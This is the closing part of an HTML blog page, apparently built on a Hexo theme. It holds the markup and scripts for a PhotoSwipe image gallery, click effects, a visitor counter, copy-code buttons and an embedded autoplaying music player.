                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->


<script src="/js/clickLove.js"></script>


<!-- ClickBoom -->


<script src="/js/clickBoom.js"></script>


<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>



    
    <div id="music">
    
    
    
    <iframe frameborder="no" border="1" marginwidth="0" marginheight="0" width="200" height="52"
        src="//music.163.com/outchain/player?type=2&id=27896818&auto=1&height=32"></iframe>
</div>

<style>
    #music {
        position: fixed;
        right: 15px;
        bottom: 0;
        z-index: 998;
    }
</style>
    
  </div>
</body>

</html>